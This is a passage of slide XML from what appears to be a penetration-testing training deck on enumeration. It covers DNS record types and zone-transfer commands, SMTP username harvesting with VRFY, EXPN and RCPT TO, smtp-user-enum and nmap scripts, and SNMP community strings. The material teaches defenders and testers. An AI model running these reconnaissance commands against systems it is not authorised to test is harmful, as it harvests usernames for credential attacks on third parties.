            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>NS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5193792" y="5852160"/>
            <a:ext cx="1874520" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>name servers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Shape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7269480" y="5541264"/>
            <a:ext cx="2103120" cy="603504"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9091"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7434072" y="5614416"/>
            <a:ext cx="1737360" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>TXT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7434072" y="5852160"/>
            <a:ext cx="1874520" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>free text, often SPF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Shape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9509760" y="5541264"/>
            <a:ext cx="2103120" cy="603504"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9091"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9674352" y="5614416"/>
            <a:ext cx="1737360" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>CNAME</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9674352" y="5852160"/>
            <a:ext cx="1874520" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>an alias</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Shape 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="6236208"/>
            <a:ext cx="11091672" cy="540957"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10142"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E1338"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="694944" y="6373368"/>
            <a:ext cx="10799064" cy="266637"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1668"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>$ dig ANY megacorp.local @TARGET          $ dig axfr megacorp.local @TARGET</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="11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03 / ENUMERATION</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SMTP   port 25</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28</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 0" descr="img/t_smtp.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1481328"/>
            <a:ext cx="5943600" cy="2953512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6812280" y="1554480"/>
            <a:ext cx="4818888" cy="3108960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>VRFY asks: does this user exist. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A 252 means yes, a 550 means no. Now you have a user list.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>EXPN expands a mailing list </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>into its members. Same idea, bigger payoff.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>RCPT TO works even when VRFY is off. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Start a fake mail and watch which recipients are accepted.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Open relay. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>If the server forwards mail for domains it does not own, anyone can send mail as your client.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="4709160"/>
            <a:ext cx="11091672" cy="789559"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6949"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E1338"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="694944" y="4846320"/>
            <a:ext cx="10799064" cy="515239"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1813"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>$ smtp-user-enum -M VRFY -U /usr/share/wordlists/names.txt -t TARGET</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1813"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>$ nmap -p25 --script smtp-enum-users,smtp-open-relay TARGET</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="5806440"/>
            <a:ext cx="11064240" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Usernames are half of a credential. Everything you collect here feeds directly into the next section.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="13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03 / ENUMERATION</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SNMP   port 161/udp</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29</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 0" descr="img/t_snmp.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1481328"/>
            <a:ext cx="6126480" cy="3355848"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6995160" y="1554480"/>
            <a:ext cx="4636008" cy="3291840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1782"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1220" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1782"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1320" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The community string is the password. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1782"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1320" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Version 1 and 2c send it in cleartext. It is public and private on far too many devices.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1320" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1782"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1220" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1782"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1320" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>It hands over an inventory. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1782"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1320" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Hostname, OS version, running processes, listening ports, interfaces, routes, sometimes local users.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1320" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1782"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1220" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1782"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1320" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Printers and switches are the worst. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1782"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1320" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
